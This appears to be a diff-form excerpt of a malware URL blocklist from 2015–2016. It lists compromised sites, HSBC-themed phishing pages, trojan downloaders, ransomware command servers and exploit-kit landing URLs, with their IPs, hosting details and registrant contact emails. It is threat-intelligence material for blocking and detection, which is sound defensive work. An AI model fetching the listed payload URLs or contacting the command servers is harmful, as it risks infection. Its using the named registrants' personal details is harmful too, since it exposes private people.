+"2015/04/22_15:17","2amsports.com/HSBC.BANK_STORAGE-DATA/new_secure.document.html","69.89.21.71","box71.bluehost.com.","Script.Exploit","-","46606","0","US", 
+"2015/04/22_15:17","broadtech.co/HSBC.BANK_STORAGE_DATA/secure-document.html","23.229.160.136","ip-23-229-160-136.ip.secureserver.net.","Script.Exploit","Jorge Signoret / jorge@signosa.com","26496","0","US",
+"2015/04/22_15:17","mtldesigns.ca/HSBC-BANK-DATA/new-secure-document.html","23.229.153.132","ip-23-229-153-132.ip.secureserver.net.","Script.Exploit","-","26496","0","US",
+"2015/04/22_15:17","ajewishgift.com/HSBC_BANK-STORAGE-DATA/secure.html","192.186.223.196","ip-192-186-223-196.ip.secureserver.net.","Script.Exploit","-","26496","0","US",
+"2015/04/22_15:17","impressoras-cartoes.com.pt/HSBC_BANK-STORAGE/new_document.html","109.71.43.41","idonic.com.","Script.Exploit","Idonicsys - Sistemas de Informação, Lda. / fccn@ptisp.pt;idonicsys@idonic.com","24768","0","PT",
+"2015/04/22_15:17","mtldesigns.ca/HSBC-BANK.STORAGE/new_secure.document.html","23.229.153.132","ip-23-229-153-132.ip.secureserver.net.","Script.Exploit","-","26496","0","US",
+"2015/04/22_15:17","bilbaopisos.es/HSBC_BANK.STORAGE_DATA/secure.payment.html","216.119.143.194","ssr1.supercp.com.","Script.Exploit","-","55293","0","US",
+"2015/04/22_15:17","sweettalk.co/HSBC_BANK-STORAGE-DATA/secure.html","192.186.240.69","ip-192-186-240-69.ip.secureserver.net.","Script.Exploit","Adam Farrar / support@hostgator.com","26496","0","US",
+"2015/04/22_15:17","sweettalk.co/HSBC_BANK.STORAGE_DATA/payment.html","192.186.240.69","ip-192-186-240-69.ip.secureserver.net.","Script.Exploit","Adam Farrar / support@hostgator.com","26496","0","US",
+"2015/04/22_15:17","wv-law.com/HSBC_BANK_DATA/secure_payment.html","160.153.48.70","ip-160-153-48-70.ip.secureserver.net.","Script.Exploit","-","26496","0","US",
+"2015/04/22_15:17","cacl.fr/HSBC-BANK_DATA/secure.html","174.127.110.239","slan-550-81.anhosting.com.","Script.Exploit","boonen_thanh@hotmail.com","29854","0","US",
+"2015/04/22_15:17","wv-law.com/HSBC.BANK_STORAGE_DATA/new_payment_document.html","160.153.48.70","ip-160-153-48-70.ip.secureserver.net.","Script.Exploit","-","26496","0","US",
+"2015/04/22_15:17","hydraulicpowerpack.com/HSBC.BANK_DATA/payment-document.html","119.18.61.133","-","Script.Exploit","Registrar Abuse Contact abuse@fabulous.com","33480","0","IN",
+"2015/04/22_15:17","aminev.com/HSBC-BANK-STORAGE-DATA/new-secure.html","69.89.22.122","box122.bluehost.com.","Script.Exploit","Registrar Abuse Contact support@bluehost.com","46606","0","US",
+"2015/04/22_15:17","broadtech.co/HSBC.BANK.STORAGE/new-document.html","23.229.160.136","ip-23-229-160-136.ip.secureserver.net.","Script.Exploit","Jorge Signoret / jorge@signosa.com","26496","0","US",
+"2015/04/22_15:17","agsteier.com/HSBC.BANK.DATA/new_secure-document.html","173.254.28.44","just44.justhost.com.","Script.Exploit","Registrar Abuse Contact abuse@enom.com","46606","0","US",
+"2015/04/22_15:17","aminev.com/HSBC-STORAGE_DATA/secure_document.html","69.89.22.122","box122.bluehost.com.","Script.Exploit","Registrar Abuse Contact support@bluehost.com","46606","0","US",
+"2015/04/22_15:17","undefined.it/HSBC_BANK-STORAGE.DATA/new_payment_document.html","174.127.110.143","slan-550-59.anhosting.com.","Script.Exploit","-","29854","0","US",
+"2015/04/22_15:17","agsteier.com/BANK_STORAGE-DATA/new.payment-document.html","173.254.28.44","just44.justhost.com.","Script.Exploit","Registrar Abuse Contact abuse@enom.com","46606","0","US",
+"2015/04/22_15:17","broadtech.co/HSBC_STORAGE_DATA/payment.html","23.229.160.136","ip-23-229-160-136.ip.secureserver.net.","Script.Exploit","Jorge Signoret / jorge@signosa.com","26496","0","US",
+"2015/04/22_15:17","cacl.fr/HSBC_BANK_DATA/new.secure.html","174.127.110.239","slan-550-81.anhosting.com.","Script.Exploit","boonen_thanh@hotmail.com","29854","0","US",
+"2015/04/22_15:17","ajewishgift.com/HSBC_BANK_STORAGE.DATA/secure.payment-document.html","192.186.223.196","ip-192-186-223-196.ip.secureserver.net.","Script.Exploit","-","26496","0","US",
+"2015/04/22_15:17","eekro.cruisingsmallship.com/oaglotogoa/pusoathuth/okexithejo/files/","176.31.28.226","-","VBS.Trojan.Downloader","-","16276","0","FR",
+"2015/04/22_15:17","ptuph.barginginfrance.net/ytooglesyw/evymoftoph/leewhigroo/files/","176.31.28.226","-","VBS.Trojan.Downloader","-","16276","0","FR",
+"2015/04/22_15:17","emits.iptvdeals.com/pigneglogl/psoomporso/whulsynsee/files/","46.30.42.74","veronikalife.ru.","VBS.Trojan.Downloader","-","35415","0","RU",
+"2015/04/22_15:17","shovi.frost-electric-supply.com/ychoomusha/uptejawhee/eegelengic/files/","93.170.123.186","programmerworld.ru.","VBS.Trojan.Downloader","-","29182","0","CZ",
+"2015/04/22_15:17","iptoo.cruisingsmallship.com/cocmeepsee/nikagnypsi/hoaboogrol/files/","176.31.28.226","-","VBS.Trojan.Downloader","-","16276","0","FR",
+"2015/04/22_15:17","uchyz.cruisingsmallship.com/vootukigli/shacmiwhoa/zipevelrid/files/","176.31.28.226","-","VBS.Trojan.Downloader","-","16276","0","FR",
+"2015/04/22_15:17","eecky.butlerelectricsupply.com/oalseebypt/hidowodruf/phaptyrsoa/files/","93.170.123.186","programmerworld.ru.","VBS.Trojan.Downloader","-","29182","0","CZ",
+"2015/04/22_15:17","zyrdu.cruisingsmallship.com/vyglachaph/choawoatch/glocoaphoo/files/","176.31.28.226","-","VBS.Trojan.Downloader","-","16276","0","FR",
+"2015/04/22_15:17","ixoox.csheaven.com/ytoocmefta/ythyreejyk/eeshoomoar/files/","46.30.42.74","veronikalife.ru.","VBS.Trojan.Downloader","-","35415","0","RU",
+"2015/04/22_15:17","gylra.cruisingsmallship.com/talsoohaha/icoagroapt/oglaheeglo/files/","176.31.28.226","-","VBS.Trojan.Downloader","-","16276","0","FR",
+"2015/04/22_15:17","oshoo.iptvdeals.com/oachudydri/theshasicm/chyshyngee/files/","46.30.42.74","veronikalife.ru.","VBS.Trojan.Downloader","-","35415","0","RU",
+"2015/04/22_15:17","coaha.frenchgerlemanelectric.com/atydymulra/psoaptylty/ywhopaptyl/files/","93.170.123.186","programmerworld.ru.","VBS.Trojan.Downloader","-","29182","0","CZ",
+"2015/04/22_15:17","echoa.randbinternationaltravel.com/wheekresip/lesorgysoj/oasemteefu/files/","176.31.28.226","-","VBS.Trojan.Downloader","-","16276","0","FR",
+"2015/04/22_15:17","ooksu.frost-electric-supply.com/sebossoode/itylseehyh/grykrostad/files/","93.170.123.186","programmerworld.ru.","VBS.Trojan.Downloader","-","29182","0","CZ",
+"2015/04/22_15:17","efugl.iptvdeals.com/avoamsyrga/ujecketird/fudsoonsep/files/","46.30.42.74","veronikalife.ru.","VBS.Trojan.Downloader","-","35415","0","RU",
+"2015/04/22_15:17","ptool.barginginfrance.net/wadostomot/oophosagli/tipsosteen/files/","176.31.28.226","-","VBS.Trojan.Downloader","-","16276","0","FR",
+"2015/04/22_15:17","ocick.frost-electric-supply.com/nasaghytho/whofydroon/glotchypiv/files/","93.170.123.186","programmerworld.ru.","VBS.Trojan.Downloader","-","29182","0","CZ",
+"2015/04/22_15:17","xotsa.frenchgerlemanelectric.com/apsestooxo/iwheewhosh/keckalrees/files/","93.170.123.186","programmerworld.ru.","VBS.Trojan.Downloader","-","29182","0","CZ",
+"2015/04/22_15:17","veksi.barginginfrance.net/oassemsoci/psolsoapsi/netsoorgaw/files/","176.31.28.226","-","VBS.Trojan.Downloader","-","16276","0","FR",
+"2015/04/22_15:17","ukugl.tourstogo.us/shudsoangu/whooglagoz/isestipsep/files/","176.31.28.226","-","VBS.Trojan.Downloader","Inna Reznik / inna@randbinternationaltravel.com","16276","0","FR",
+"2015/04/22_15:17","greev.randbinternationaltravel.com/sheptighut/groadratoa/omedryglol/files/","176.31.28.226","-","VBS.Trojan.Downloader","-","16276","0","FR",
+"2015/04/22_15:17","simpi.tourstogo.us/vodopsoopu/dumseessee/viphadeeph/files/","176.31.28.226","-","VBS.Trojan.Downloader","Inna Reznik / inna@randbinternationaltravel.com","16276","0","FR",
+"2015/04/22_15:17","iwhab.randbinternationaltravel.com/etuwotsols/phydretack/psyveshool/files/","176.31.28.226","-","VBS.Trojan.Downloader","-","16276","0","FR",
+"2015/04/22_15:17","whabi.csheaven.com/ehetsusywh/yglegrehee/jitypsewhy/files/","46.30.42.74","veronikalife.ru.","VBS.Trojan.Downloader","-","35415","0","RU",
+"2015/04/22_15:17","nonsi.csheaven.com/udoartorsa/oathampoat/uzostecmew/files/","46.30.42.74","veronikalife.ru.","VBS.Trojan.Downloader","-","35415","0","RU",
+"2015/04/22_15:17","namso.butlerelectricsupply.com/yfuksajozi/phidampoas/ufykampoap/files/","93.170.123.186","programmerworld.ru.","VBS.Trojan.Downloader","-","29182","0","CZ",
+"2015/04/22_15:17","eroov.iptvdeals.com/wheedessyh/uptoowhooj/urognotchy/files/","46.30.42.74","veronikalife.ru.","VBS.Trojan.Downloader","-","35415","0","RU",
+"2015/04/22_15:17","rawoo.barginginfrance.net/deethevoaz/upsachoaju/poastycith/files/","176.31.28.226","-","VBS.Trojan.Downloader","-","16276","0","FR",
+"2015/04/22_15:17","hoawy.frost-electric-supply.com/synestyfoo/oampansoam/fetuksessu/files/","93.170.123.186","programmerworld.ru.","VBS.Trojan.Downloader","-","29182","0","CZ",
+"2015/04/22_15:17","wetyt.tourstogo.us/shissashee/abekekurdi/oagrusteel/files/","176.31.28.226","-","VBS.Trojan.Downloader","Inna Reznik / inna@randbinternationaltravel.com","16276","0","FR",
+"2015/04/22_15:17","uvidu.butlerelectricsupply.com/ephuhoawud/fodrejymta/pugnovesho/files/","93.170.123.186","programmerworld.ru.","VBS.Trojan.Downloader","-","29182","0","CZ",
+"2015/04/22_15:17","asham.tourstogo.us/oadirteeph/eeroaghyss/evoarsoshi/files/","176.31.28.226","-","VBS.Trojan.Downloader","Inna Reznik / inna@randbinternationaltravel.com","16276","0","FR",
+"2015/04/22_15:17","oakso.tourstogo.us/pheekseeku/kirystobul/exeedsoots/files/","176.31.28.226","-","VBS.Trojan.Downloader","Inna Reznik / inna@randbinternationaltravel.com","16276","0","FR",
+"2015/04/22_15:17","dujur.barginginfrance.net/oampimsika/foowimupho/thampoperd/files/","176.31.28.226","-","VBS.Trojan.Downloader","-","16276","0","FR",
+"2015/04/22_15:17","keemy.butlerelectricsupply.com/zyrsoltoah/duftuxoxyz/epheenyzug/files/","93.170.123.186","programmerworld.ru.","VBS.Trojan.Downloader","-","29182","0","CZ",
+"2015/04/22_15:17","ithyk.frenchgerlemanelectric.com/cywhamsoaj/thamtampee/oodsardoon/files/","93.170.123.186","programmerworld.ru.","VBS.Trojan.Downloader","-","29182","0","CZ",
+"2015/04/22_15:17","vitha.csheaven.com/awygludoav/ooghooksek/puptywoamt/files/","46.30.42.74","veronikalife.ru.","VBS.Trojan.Downloader","-","35415","0","RU",
+"2015/04/22_15:17","esoad.frost-electric-supply.com/psutsoshup/phastupsim/tigrystolt/files/","93.170.123.186","programmerworld.ru.","VBS.Trojan.Downloader","-","29182","0","CZ",
+"2015/04/22_15:17","gurde.tourstogo.us/leefoohopt/ezussoadyz/utufegheer/files/","176.31.28.226","-","VBS.Trojan.Downloader","Inna Reznik / inna@randbinternationaltravel.com","16276","0","FR",
+"2015/04/22_15:17","oampa.csheaven.com/ovoamegloa/ishoodooho/whetcheeng/files/","46.30.42.74","veronikalife.ru.","VBS.Trojan.Downloader","-","35415","0","RU",
+"2015/04/22_15:17","acool.csheaven.com/okoassetch/buweegnogr/ereedrimtu/files/","46.30.42.74","veronikalife.ru.","VBS.Trojan.Downloader","-","35415","0","RU",
+"2015/04/22_15:17","phoaz.cruisingsmallship.com/thymuksate/ysigorguru/stogroaryf/files/","176.31.28.226","-","VBS.Trojan.Downloader","-","16276","0","FR",
+"2015/04/22_15:17","oshoa.iptvdeals.com/whoagrofta/shaphygyft/oomtyrtogl/files/","46.30.42.74","veronikalife.ru.","VBS.Trojan.Downloader","-","35415","0","RU",
+"2015/04/22_15:17","psooz.tourstogo.us/joacumupty/yduhoalrow/ooksyfoogl/files/","176.31.28.226","-","VBS.Trojan.Downloader","Inna Reznik / inna@randbinternationaltravel.com","16276","0","FR",
+"2015/04/22_15:17","oolsi.frost-electric-supply.com/eerutsuleh/oamteejigl/shogrodroo/files/","93.170.123.186","programmerworld.ru.","VBS.Trojan.Downloader","-","29182","0","CZ",
+"2015/04/22_15:17","kulro.csheaven.com/dersyphalr/kyjorsoalt/rywoarsoaz/files/","46.30.42.74","veronikalife.ru.","VBS.Trojan.Downloader","-","35415","0","RU",
+"2015/04/22_15:17","eeroo.frost-electric-supply.com/phoagnonga/oshuzoathu/anunserogy/files/","93.170.123.186","programmerworld.ru.","VBS.Trojan.Downloader","-","29182","0","CZ",
+"2015/04/22_15:17","gyboo.cruisingsmallship.com/phyckyhert/oaltesteef/ptoneewhis/files/","176.31.28.226","-","VBS.Trojan.Downloader","-","16276","0","FR",
+"2015/04/22_15:17","rumog.frost-electric-supply.com/ooxyphuxoa/oodrirolta/javyphepti/files/","93.170.123.186","programmerworld.ru.","VBS.Trojan.Downloader","-","29182","0","CZ",
+"2015/04/22_15:17","veevu.tourstogo.us/yxampoavoo/psopansoom/ithexoakib/files/","176.31.28.226","-","VBS.Trojan.Downloader","Inna Reznik / inna@randbinternationaltravel.com","16276","0","FR",
+"2015/04/22_15:17","eetho.cruisingsmallship.com/fustochoox/areltussen/hoogroxuga/files/","176.31.28.226","-","VBS.Trojan.Downloader","-","16276","0","FR",
+"2015/04/22_15:17","oojee.barginginfrance.net/poovajywhi/ooghovelee/madroompob/files/","176.31.28.226","-","VBS.Trojan.Downloader","-","16276","0","FR",
+"2015/04/22_15:17","igoby.frost-electric-supply.com/eesefteeps/ookeestool/meefeleezu/files/","93.170.123.186","programmerworld.ru.","VBS.Trojan.Downloader","-","29182","0","CZ",
+"2015/04/22_15:17","upsoj.iptvdeals.com/doaryruptu/uroassulah/foomosoglo/files/","46.30.42.74","veronikalife.ru.","VBS.Trojan.Downloader","-","35415","0","RU",
+"2015/04/22_15:17","oosee.barginginfrance.net/buksyngems/boofoostiw/orignujonu/files/","176.31.28.226","-","VBS.Trojan.Downloader","-","16276","0","FR",
+"2015/04/22_15:17","oawoo.frenchgerlemanelectric.com/utyfatheex/nurirsoaja/rojingaroo/files/","93.170.123.186","programmerworld.ru.","VBS.Trojan.Downloader","-","29182","0","CZ",
+"2015/04/22_15:17","whave.iptvdeals.com/panoowyxoz/oazicmitov/ptampordap/files/","46.30.42.74","veronikalife.ru.","VBS.Trojan.Downloader","-","35415","0","RU",
+"2015/04/22_15:17","kyrsu.frost-electric-supply.com/wowoathept/grishamesa/weemoseevo/files/","93.170.123.186","programmerworld.ru.","VBS.Trojan.Downloader","-","29182","0","CZ",
+"2015/04/22_15:17","mocka.frost-electric-supply.com/zarseehetu/igaksuxals/kyroalopsa/files/","93.170.123.186","programmerworld.ru.","VBS.Trojan.Downloader","-","29182","0","CZ",
+"2015/04/22_15:17","pulso.butlerelectricsupply.com/uthoachugr/uceerdyhap/ochadikist/files/","93.170.123.186","programmerworld.ru.","VBS.Trojan.Downloader","-","29182","0","CZ",
+"2015/04/22_15:17","nefib.tourstogo.us/shoampakre/igoawootsi/greengeeku/files/","176.31.28.226","-","VBS.Trojan.Downloader","Inna Reznik / inna@randbinternationaltravel.com","16276","0","FR",
+"2015/04/22_15:17","oapsa.tourstogo.us/looreeneps/yshoobeeje/syshyshogo/files/","176.31.28.226","-","VBS.Trojan.Downloader","Inna Reznik / inna@randbinternationaltravel.com","16276","0","FR",
+"2015/04/22_15:17","azoos.csheaven.com/eechoawoap/rissupsuns/bigleeptuf/files/","46.30.42.74","veronikalife.ru.","VBS.Trojan.Downloader","-","35415","0","RU",
+"2015/04/22_15:17","ptush.iptvdeals.com/oapsoadoov/vooglebopo/oasoardexy/files/","46.30.42.74","veronikalife.ru.","VBS.Trojan.Downloader","-","35415","0","RU",
+"2015/04/22_15:17","zibup.csheaven.com/ypsoophoov/ptycmympub/teezukedoo/files/","46.30.42.74","veronikalife.ru.","VBS.Trojan.Downloader","-","35415","0","RU",
+"2015/04/22_15:17","atyss.barginginfrance.net/aseerteert/ootoorezav/olaweersyb/files/","176.31.28.226","-","VBS.Trojan.Downloader","-","16276","0","FR",
+"2015/04/22_15:17","ptewh.iptvdeals.com/foogloajuc/eeshedyfon/yvookrynso/files/","46.30.42.74","veronikalife.ru.","VBS.Trojan.Downloader","-","35415","0","RU", +"2015/04/22_15:17","igroo.barginginfrance.net/ogroatashy/osynoonsax/ydumtixivy/files/","176.31.28.226","-","VBS.Trojan.Downloader","-","16276","0","FR", +"2015/04/22_15:17","oofuv.cruisingsmallship.com/oozughoars/psoakraghi/oawygroors/files/","176.31.28.226","-","VBS.Trojan.Downloader","-","16276","0","FR", +"2015/04/22_15:17","pigra.csheaven.com/eveebichoa/xygyrtoolt/ooholtoaka/files/","46.30.42.74","veronikalife.ru.","VBS.Trojan.Downloader","-","35415","0","RU", +"2015/04/22_15:17","dofeb.frenchgerlemanelectric.com/iglejimoar/upsudypooz/leepeegrah/files/","93.170.123.186","programmerworld.ru.","VBS.Trojan.Downloader","-","29182","0","CZ", +"2015/04/22_15:17","igagh.tourstogo.us/chogoajeep/uhozyngako/iphoasteer/files/","176.31.28.226","-","VBS.Trojan.Downloader","Inna Reznik / inna@randbinternationaltravel.com","16276","0","FR", +"2015/04/22_15:17","estoa.frost-electric-supply.com/ukoatiptyv/upseeboapo/ufekyckaft/files/","93.170.123.186","programmerworld.ru.","VBS.Trojan.Downloader","-","29182","0","CZ", +"2015/04/22_15:17","ubike.tourstogo.us/lussoaglee/raxadsunyx/oatchingoa/files/","176.31.28.226","-","VBS.Trojan.Downloader","Inna Reznik / inna@randbinternationaltravel.com","16276","0","FR", +"2015/04/22_15:17","boogu.barginginfrance.net/peehejoaty/avugnemtee/hibygnoars/files/","176.31.28.226","-","VBS.Trojan.Downloader","-","16276","0","FR", +"2015/04/22_15:17","oowhe.frost-electric-supply.com/ejisoozach/esisseeloo/oajilitsof/files/","93.170.123.186","programmerworld.ru.","VBS.Trojan.Downloader","-","29182","0","CZ", +"2015/04/22_15:17","nugly.barginginfrance.net/oogamtoafo/eestathici/athiphisik/files/","176.31.28.226","-","VBS.Trojan.Downloader","-","16276","0","FR", +"2015/04/24_19:11","www.thesparkmachine.com/Antivirus.zip","208.113.197.192","apache2-emu.paulding.dreamhost.com.","FakeAV","Registrar 
Abuse Contact abuse@web.com","26347","0","US", +"2015/05/11_10:05","www.motivacionyrelajacion.com/Z0H24k7E6A/","50.62.31.207","ip-50-62-31-207.ip.secureserver.net.","trojan","-","26496","0","US", +"2015/05/12_19:41","executivecoaching.co.il/IsKgVrtvQ/","109.226.10.37","-","trojan","-","50463","0","IL", +"2015/06/02_07:16","www.volleyball-doppeldorf.de/templates/blau_weiss/n8jh3wbr.php?id=60716163","37.218.254.115","c15.webspace-verkauf.de.","iframe on compromised site leads to exploit kit","info@webspace-verkauf.de","45031","0","DE", +"2015/06/02_07:16","winsetupcostotome.easthamvacations.info/answered-polynomial-eccentricity-unserviceable/029287718218614814","94.242.198.222","ip-static-94-242-198-222.server.lu.","exploit kit","Martie Cunningham / firetower@capecod.net","5577","0","LU", +"2015/06/29_16:20","lifescience.sysu.edu.cn/filees/guuu16pesche.asp","202.116.65.35","lifescience.sysu.edu.cn.","Leads to exploit","-","4538","0","CN", +"2015/07/20_18:46","atlcourier.com/wp-content/plugins/cached_data/k1.exe","72.52.170.149","host.betterwphosting.com.","Trojan.P0ny","Registrant GCROSS@ATLCOURIER.COM","32244","0","US", +"2015/07/20_18:46","www.mondoperaio.net/wp-content/plugins/cached_data/k1.exe","62.149.144.66","webx544.aruba.it.","Trojan.P0ny","Registrar Abuse Contact domainabuse@tucows.com","31034","0","IT", +"2015/09/03_05:16","krsa2gno.internet-security-alert.com/0H4RuV82F4sgUoM42smmqB4doKnVprIJ/","52.10.128.168","ec2-52-10-128-168.us-west-2.compute.amazonaws.com.","Browlock.Fake.TechSupport","-","16509","0","US", +"2015/09/03_05:16","krsa2gno.todays-sweepstakes-winner.com/0H4RuV82F4sgUoM42smmqB4doKnVprIJ/","52.10.128.168","ec2-52-10-128-168.us-west-2.compute.amazonaws.com.","Browlock.Fake.TechSupport","-","16509","0","US", +"2015/09/03_05:16","krsa2gno.congrats-sweepstakes-winner.com/0H4RuV82F4sgUoM42smmqB4doKnVprIJ/","52.10.128.168","ec2-52-10-128-168.us-west-2.compute.amazonaws.com.","Browlock.Fake.TechSupport","-","16509","0","US", 
+"2015/09/03_05:16","krsa2gno.important-security-brower-alert.com/0H4RuV82F4sgUoM42smmqB4doKnVprIJ/","52.10.128.168","ec2-52-10-128-168.us-west-2.compute.amazonaws.com.","Browlock.Fake.TechSupport","-","16509","0","US", +"2015/09/03_05:16","krsa2gno.youre-todays-lucky-sweeps-winner.com/0H4RuV82F4sgUoM42smmqB4doKnVprIJ/","52.10.128.168","ec2-52-10-128-168.us-west-2.compute.amazonaws.com.","Browlock.Fake.TechSupport","-","16509","0","US", +"2015/09/03_21:21","ab.usageload32.com/zz/kudhg87s7882bi/mmerrorx.html?tid=x4v&os=Windows&osv=7&isp=Comcast%20Cable&browser=Firefox&ip=Firefox","184.50.238.184","a184-50-238-184.deploy.static.akamaitechnologies.com.","Browlock, Fake.TechSupport","Registrar Abuse Contact abuse@tldregistrarsolutions.com","20940","0","US", +"2015/09/06_00:08","fondazioneciampi.org/nuovo/blogs/media/ap2.php","66.36.163.207","gasco.com.sa.","Trojan.CryptoLocker.CallBack","Daniele Ciampi / dannywiz2002@hotmail.com","14265","0","US", +"2015/09/06_00:08","europe-academy.net/wp-admin/user/ap2.php","192.232.249.212","-","Trojan.CryptoLocker.CallBack","Registrant HM7FQW9YRP9K4GA@PROXY.DREAMHOST.COM","46606","0","US", +"2015/09/17_22:43","1866809.securefastserver.com/~keycodes777/x1/login.php","86.105.227.125","-","Bot.C2","Registrant info@qhoster.com","49335","0","EU", +"2015/09/26_14:56","skidki-yuga.ru/files/17448.jpg","5.101.152.85","m2.yoda.beget.ru.","PHP.RFI","-","198610","0","RU", +"2015/09/26_14:56","kfc.i.illuminationes.com/snitch?default_keyword=&referrer=&se_referrer=&source=","91.226.33.54","d6828.core-vps.lv.","Script.iFrame.TDS (via compromised sites)","Registrar Abuse Contact abuse@bizcn.com","56617","0","LV", +"2015/10/16_07:33","www.smartscan.ro","85.9.27.130","s13v.webindex.ro.","compromised site leads to exploit kit","-","5588","0","RO", +"2015/10/16_07:41","lunaticjazz.com","69.163.200.161","apache2-bongo.koechlin.dreamhost.com.","Trojan.Ramnit","Registrant jotawagner@gmail.com","26347","0","US", 
+"2015/10/24_03:50","-","155.133.18.117/121fjrgoneXyeia1c3v1e3e1e2w4c3e1a3j7a3z4a1f2a1a2z1a3a4e1a2ba2a1w3.exe","ptr-155.133.18.117.vmline.pl.","Trojan.Andromeda","-","197226","0","DE", +"2015/10/24_03:50","-","155.133.18.117/goldenbet403.exe","ptr-155.133.18.117.vmline.pl.","Trojan.Andromeda","-","197226","0","DE", +"2015/10/24_03:50","-","155.133.18.117/235fjrgoneXyeia1c3v1e3e1e2w4c3e1a3j7a3z4a1f2a1a2z1a3a4e1a2ba2a1w3.exe","ptr-155.133.18.117.vmline.pl.","Trojan.Andromeda","-","197226","0","DE", +"2015/10/24_03:50","-","155.133.18.117/nut50a403.exe","ptr-155.133.18.117.vmline.pl.","Trojan.Andromeda","-","197226","0","DE", +"2015/10/24_03:50","-","155.133.18.117/38yes3.exe","ptr-155.133.18.117.vmline.pl.","Trojan.Andromeda","-","197226","0","DE", +"2015/11/03_08:24","earthcontrolsys.com/abuse_report.php?issviews.com","69.50.210.69","-","Trojan.Backdoor","Registrant info@earthcontrolsys.com","18866","0","US", +"2016/01/06_15:19","-","46.30.45.39/yyo.w","vz110372.eurodir.ru.","Cryptowall ransomware","-","35415","0","RU", +"2016/01/06_15:19","-","46.30.45.39/Statement.jpg","vz110372.eurodir.ru.","Cryptowall download script","-","35415","0","RU", +"2015/11/30_10:20","www.imagerieduroc.com/","83.143.18.95","ds95.digital-network.net.","compromised site leads to EK","Registrar Abuse Contact abuse@ovh.net","34235","0","FR", +"2015/12/14_22:05","www.drteachme.com/wp-content/plugins/theme-check/misc.php","198.154.254.250","glulife.glulife.com.","trojan","Registrant ENOM@VIZMOTION.COM","46606","0","US", +"2015/12/20_11:16","eeps.me/","208.67.23.26","h155.cpanellogin.net.","ESET phishing","WhoisGuard Protected / 16c2a1b16681459e91467194536acdbf.protect@whoisguard.com","3257","0","US", +"2015/12/26_15:34","www.hitekshop.vn/login.php","112.78.2.101","mb2d101.vdrs.net.","Keybase keylogger web panel","-","45538","0","VN", +"2015/12/28_20:16","betterhomeandgardenideas.com/dbsys.php","192.185.52.247","-","Teslacrypt ransomware c&c","-","20013","0","US", 
+"2015/12/28_20:16","yigitakcali.com/dbsys.php","160.153.16.29","ip-160-153-16-29.ip.secureserver.net.","Teslacrypt ransomware c&c","Registrant mahoni_17@hotmail.com","26496","0","US", +"2015/12/30_19:54","healthybloodpressure.info/2uOioq.php","50.63.56.47","ip-50-63-56-47.ip.secureserver.net.","Cryptowall ransomware C&C","HEALTHYBLOODPRESSURE.INFO@domainsbyproxy.com","26496","0","US", +"2016/01/12_08:49","www.scantanzania.com/bin/img/make.html","64.202.115.199","twiga-ip5.tanzaniawebhosting.com.","phishing","Registrant scantan@raha.com","23352","0","US", +"2016/01/12_08:53","www.technix.it/","217.194.6.34","vchicken.oval.it.","compromised site leads to exploit kit","-","12637","0","IT", +"2016/01/12_08:53","www.reifen-simon.com/","176.9.198.14","static.14.198.9.176.clients.your-server.de.","compromised site leads to exploit kit","Registrar Abuse Contact abuse@vautron.de","24940","0","DE", +"2016/01/12_09:58","szinhaz.hu/","185.43.205.98","szinhaz.hu.","compromised site leads to exploit kit","-","62214","0","HU", +"2016/01/12_10:08","www.ostsee-schnack.de/","80.67.28.137","dgws10s3-1-5db.ispgateway.de.","compromised site leads to exploit kit","hostmaster@domainfactory.de","34011","0","DE", +"2016/01/13_15:10","inclusivediversity.co.uk/wp-content/upgrade/","217.199.187.192","web192.extendcp.co.uk.","Paypal Phishing (Redirect)","Sasha Scott / -","20738","0","GB", +"2016/01/18_14:18","www.rst-velbert.de/","91.184.35.130","merkur.incoweb.de.","iframe on compromised site leads to EK","support@incoweb.de","34225","0","DE", +"2016/01/18_14:18","www.gasthofpost-ebs.de/","81.169.251.136","h2402507.stratoserver.net.","iframe on compromised site leads to EK","hostmaster@serverkompetenz.de","6724","0","DE", +"2016/01/19_07:37","avppet.com/wp-includes/js/tinymce/plugins/media/Oracle_32.zip","173.254.37.144","173-254-37-144.unifiedlayer.com.","Java installation abused for installing Java malware","-","46606","0","US", 
+"2016/01/19_07:37","avppet.com/wp-includes/js/tinymce/plugins/media/Oracle_64.zip","173.254.37.144","173-254-37-144.unifiedlayer.com.","Java installation abused for installing Java malware","-","46606","0","US", +"2016/01/19_09:03","blog.replacemycontacts.com/","50.62.235.1","p3nlhg498c1498.shr.prod.phx3.secureserver.net.","compromised site leads to exploit kit","Registrant RTMVNDRYVP@WHOISPRIVACYPROTECT.COM","26496","0","US", +"2016/01/19_09:50","pradakomechanicals.com/","203.124.103.1","sg2nlhg500c1500.shr.prod.sin2.secureserver.net.","compromised site leads to exploit kit","-","26496","0","SG", +"2016/01/19_11:30","www.profill-smd.com/","77.55.57.113","acf113.rev.netart.pl.","compromised site leads to exploit kit","Registrar Abuse Contact abuse@netart-registrar.com","15967","0","PL", +"2016/01/20_12:33","www.areadiprova.eu/gardani/","80.247.79.174","mail.360at.net.","compromised site leads to exploit kit","NOT DISCLOSED! / -","12850","0","IT", +"2016/01/21_13:06","www.cifor.com/","213.186.33.84","basic-cdn-01.cluster003.ovh.net.","iframe on compromised site leads to EK","Registrar Abuse Contact abuse@web.com","16276","0","FR", +"2016/01/23_00:46","www.proascolcolombia.com/portal/modules/mod_banners/Imprimir_IntimacaoCTI2015-03698541.rar?cli=Cliente&/yRpBKPujKU/nNqRc6QsuO.php","190.8.176.235","bartolome.colombiahosting.com.co.","Trojan.Banload","Registrant dominios@colombiahosting.com.co","52335","0","CO", +"2016/01/23_00:46","jktdc.in/images/klb/azxvas.gif","72.55.186.8","s005.panelboxmanager.com.","Trojan.Banload","Mr. Fayaz / jktdc@aford.net","32613","0","CA", +"2016/01/23_00:46","www.proascolcolombia.com/portal/modules/mod_banners/Imprimir_IntimacaoCTI2015-03698541.rar?cli=Cliente&/yRpBKPujKU/nNqRc6QsuO.php","190.8.176.235","bartolome.colombiahosting.com.co.","Trojan.Banload","Registrant dominios@colombiahosting.com.co","52335","0","CO", +"2016/01/23_00:46","jktdc.in/images/klb/azxvas.gif","72.55.186.8","s005.panelboxmanager.com.","Trojan.Banload","Mr. 
